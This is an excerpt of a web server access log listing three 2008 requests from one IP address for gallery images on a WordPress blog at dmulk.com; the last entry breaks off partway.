72.199.235.196 - - [20/Sep/2008:11:01:04 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-122.jpg HTTP/1.1" 200 312231 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:11:01:18 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-079.jpg HTTP/1.1" 200 314695 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:11:01:31 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-027_0.jpg HTTP/1.1" 200 2463